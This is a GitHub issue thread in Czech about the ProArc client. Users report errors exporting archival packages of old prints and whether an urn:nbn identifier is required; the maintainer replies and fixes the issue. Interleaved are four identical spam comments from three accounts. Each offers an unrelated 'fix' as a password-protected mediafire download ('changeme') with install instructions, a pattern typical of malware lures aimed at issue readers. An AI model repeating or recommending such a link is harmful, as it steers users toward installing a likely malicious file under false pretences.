### ISSUE TITLE
Chyby při exportu archivního balíčku starých tisků

### ISSUE THREAD

**Issue by ZdenkaSera** [proarc/proarc-client#592]
**1. vyžaduje urn:nbn**
Při exportu archivního balíčku k STT se sice stále ukazuje dialogová hláška o chybějícím urn:nbn, kterou lze překonat, ale export pak skončí chybou ve správě procesů.

![image](https://github.com/user-attachments/assets/964c23ae-48c0-4c22-aaf0-efc0e4cd4c41)

![image](https://github.com/user-attachments/assets/bfb59317-8b42-456d-aae2-16f74afd79e7)

**2. ani s přiděleným urn:nbn nelze exportovat**, hlásí chybu (viz export objektu 47ba5189-3445-4d3d-a7ba-d782ac955d56 na masteru)

![image](https://github.com/user-attachments/assets/7b6c6eb3-9d35-4ba7-b10c-d28817d81496)

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SykoraLukas** [comment]
Souvisí s [validací](https://github.com/proarc/proarc/issues/1532). Vytvořil jsem i kontrolu na vyplněnost pageType, ale nedošlo mi, že normalPage právě pageType vyplněný nemá. Opravím.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SykoraLukas** [comment]
> na masteru jsem založila novou STT monografii - uuid: 2333b4f7-01b7-4184-a3e5-ded369a3ab46. Pořád chce urn:nbn - prosím, koukneš na to? Díky.

To je ale přeci správně, objekt nemá přidělené URN:NBN.

**Comment by SykoraLukas** [comment]
Po přidělení URN:NBN již export funguje.

![image](https://github.com/user-attachments/assets/7a17b69f-4f69-4490-bcc4-f0ff10b8b50d)

**Comment by ZdenkaSera** [comment]
Lukáši, my si tu asi nerozumíme - my přece nechceme STT objektům přiřazovat povinně urn:nbn - proto byla v klientovi hláška, kterou bylo možno překonat a exportovat archivní balíček STT i bez urn:nbn. To bychom chtěli zachovat, i když časem budeme urn:nbn přidělovat i STT.

**Comment by SykoraLukas** [comment]
Dobře, myslel jsem, že je urnnbn i pro stare tisky již také povinné po vzoru NDK.

**Comment by SykoraLukas** [comment]
Opraveno, již není povinné. K testu.
